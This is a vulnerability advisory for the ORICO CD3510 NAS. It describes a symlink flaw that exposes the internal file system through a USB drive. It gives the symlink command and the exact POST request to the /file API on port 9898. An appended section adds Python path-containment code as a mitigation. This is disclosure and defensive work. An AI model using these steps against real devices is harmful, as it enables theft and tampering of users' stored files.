Information

Vendor: ORICO

Affected Product: CD3510 NAS ≤ V1.9.12

Vendor Homepage: https://orico.cc/

Vendor Contact Information: supports@orico.com.cn


Description

The ORICO NAS CD3510 (version V1.9.12 and below) contains a vulnerability that attackers can exploit to leak or tamper with the internal file system. The vulnerability stems from lax checks on symbolic links on external USB devices. An attacker can create a symbolic link on a USB drive that points to the root directory (/), insert the drive into the NAS device's USB slot, and then access the symlinked directory through the drive's mount on the NAS to obtain all files within the NAS system and tamper with those files.

Exploit Demo

Format the USB drive as ext4, then create a symbolic link on it that points to the root directory, for example with sudo ln -s / rootdir.


Then insert the USB flash drive into the external USB slot of the NAS device. An attacker can send the following POST request to the /file interface on port 9898 of the NAS and export the entire internal file system of the NAS through the symbolic link on the USB drive.

{
  "session": "HS_clo41CDBJEgM4VEafG0QK4GggLDrp6",
  "method": "manage",
  "params": {
    "action": 0,
    "des_path_type": 2,
    "todir": "/",
    "cmd": "copy",
    "path": [
      "/sdc1/rootdir/***"
    ],
    "share_path_type": 7,
    "to_groupid": 0
  }
}


Finally, we can see that the entire file system directory inside the NAS has been exported.
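The missing check, sketched as an added example (this is not ORICO's code and not part of the original advisory): a file service should resolve every requested path and refuse anything that lands outside the external drive's mount point, and a recursive copy should not follow links at all. The function names and the temporary directory layout are hypothetical and constructed for the demonstration.

```python
import os
import tempfile


def naive_check(mount_root, requested):
    """Lexical check only: collapses '..' but never inspects symlinks."""
    path = os.path.normpath(os.path.join(mount_root, requested.lstrip("/")))
    return path == mount_root or path.startswith(mount_root + os.sep)


def resolve_inside(mount_root, requested):
    """Return the resolved path if it stays under mount_root, else None."""
    root = os.path.realpath(mount_root)
    target = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    return target if os.path.commonpath([root, target]) == root else None


def safe_walk(mount_root):
    """List regular files for a copy job without following any symlink."""
    root = os.path.realpath(mount_root)
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if not os.path.islink(full):  # skip links to files as well
                found.append(os.path.relpath(full, root))
    return sorted(found)


def demo():
    """Constructed layout: 'internal' stands in for NAS storage, 'usb' for the drive."""
    base = os.path.realpath(tempfile.mkdtemp())
    internal, usb = os.path.join(base, "internal"), os.path.join(base, "usb")
    os.makedirs(internal)
    os.makedirs(usb)
    for path in (os.path.join(internal, "secret.conf"), os.path.join(usb, "photo.jpg")):
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
    os.symlink(base, os.path.join(usb, "rootdir"))  # link that leaves the drive
    request = "rootdir/internal/secret.conf"
    return {
        "naive": naive_check(usb, request),        # True: accepted
        "strict": resolve_inside(usb, request),    # None: rejected
        "plain": resolve_inside(usb, "photo.jpg"),
        "walk": safe_walk(usb),
    }


if __name__ == "__main__":
    print(demo())
```

A resolve-then-open check can still race with someone changing the link between the two steps, so on Linux the same containment rule is better enforced at open time, for example with openat2() and RESOLVE_BENEATH.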


Credit

NASchecker